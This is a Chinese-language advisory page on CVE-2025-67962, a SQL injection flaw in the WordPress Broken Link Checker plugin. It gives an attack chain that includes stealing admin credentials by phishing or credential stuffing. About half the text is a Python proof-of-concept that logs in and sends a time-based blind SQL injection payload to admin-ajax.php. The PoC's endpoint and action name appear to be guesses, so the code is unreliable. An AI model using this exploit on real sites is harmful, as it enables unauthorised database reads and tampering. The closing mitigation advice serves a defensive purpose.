CVE-2025-67962 WordPress Broken Link Checker插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-67962

漏洞类型

SQL注入

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Broken Link Checker (WordPress插件 by AIOSEO Plugin Team)

漏洞概述

CVE-2025-67962是WordPress插件Broken Link Checker中的一个高危SQL注入漏洞。该漏洞由Patchstack安全团队发现，存在于插件的1.2.6及以下版本中。漏洞源于对SQL命令中特殊元素的不当中和处理，攻击者可利用此漏洞在数据库查询中注入恶意SQL代码片段，从而实现未授权的数据库操作。由于该漏洞需要高权限认证才能利用（CVSS认证要求为PR:H），因此主要威胁对象为多用户WordPress环境中具有管理员权限的账户被入侵后的横向移动攻击。攻击成功后，攻击者可读取敏感数据库信息，甚至可能修改数据库内容，对网站数据安全构成严重威胁。

技术细节

该SQL注入漏洞位于Broken Link Checker插件的broken-link-checker-seo组件中。漏洞根源在于插件在处理用户输入时，未对特殊字符进行充分的过滤和转义，直接将用户可控数据拼接到SQL查询语句中。攻击者可以通过构造特定的HTTP请求参数，在SQL查询中注入恶意SQL语句。由于CVSS向量显示攻击复杂度为低（AC:L），且可通过网络远程利用（AV:N），攻击者无需特殊网络位置即可发起攻击。漏洞利用需要具有高权限账户（如管理员），攻击者可利用被入侵的高权限账户或通过其他方式获取凭证后，发送精心构造的请求触发SQL注入。成功利用后，攻击者可读取数据库中的敏感信息，包括用户凭据、站点配置等敏感数据。

攻击链分析

STEP 1

步骤1：侦察与信息收集

攻击者识别目标WordPress网站并确认安装了Broken Link Checker插件，版本<=1.2.6

STEP 2

步骤2：获取高权限账户

通过钓鱼攻击、凭据填充或利用其他漏洞获取WordPress管理员账户的登录凭据

STEP 3

步骤3：构造恶意请求

使用获取的管理员会话认证，构造包含SQL注入载荷的HTTP请求，发送到插件的受影响端点

STEP 4

步骤4：触发SQL注入

发送精心构造的请求参数，插件将恶意SQL代码拼接到数据库查询中执行

STEP 5

步骤5：数据提取或持久化

根据注入的SQL语句，从数据库中提取敏感信息（如用户表、配置数据）或植入后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67962 SQL Injection PoC
# Target: WordPress Broken Link Checker Plugin <= 1.2.6
# Note: Requires high-privilege authentication (Admin)

import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "admin"
PASSWORD = "password"

def get_auth_token():
    """Obtain WordPress authentication cookie/token"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In'
    }
    response = session.post(login_url, data=login_data, allow_redirects=False)
    if 'wordpress_logged_in' in str(response.cookies) or response.status_code == 302:
        return session.cookies
    return None

def exploit_sql_injection(session):
    """Exploit SQL injection in Broken Link Checker plugin"""
    # Target endpoint - typically in admin-ajax.php or plugin's API endpoint
    exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # SQL injection payload - Time-based blind SQL injection
    sql_payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '--"
    
    # Craft malicious request
    exploit_data = {
        'action': 'blc_process_links',
        'link_url': sql_payload,
        'link_text': 'test'
    }
    
    try:
        response = session.post(exploit_url, data=exploit_data, timeout=10)
        return response.text
    except requests.exceptions.Timeout:
        return "SQL Injection confirmed - Time delay detected"
    return None

def main():
    print("[*] CVE-2025-67962 SQL Injection Exploitation")
    print("[*] Target: Broken Link Checker Plugin <= 1.2.6")
    
    print("[*] Authenticating as high-privilege user...")
    cookies = get_auth_token()
    if not cookies:
        print("[-] Authentication failed")
        sys.exit(1)
    
    print("[+] Authentication successful")
    print("[*] Sending SQL injection payload...")
    
    session = requests.Session()
    session.cookies = cookies
    result = exploit_sql_injection(session)
    
    if result:
        print("[+] Response received")
        print(result)

if __name__ == "__main__":
    main()

影响范围

Broken Link Checker插件 <= 1.2.6 (所有版本)

防御指南

临时缓解措施

由于该漏洞需要高权限认证才能利用，最有效的缓解措施是保护管理员账户安全：启用双因素认证（2FA）、使用强密码策略、限制登录尝试次数、监控异常登录行为。在官方发布安全更新前，可通过Web应用防火墙（WAF）规则暂时阻断针对该插件端点的恶意请求，同时考虑暂时禁用Broken Link Checker插件以消除风险。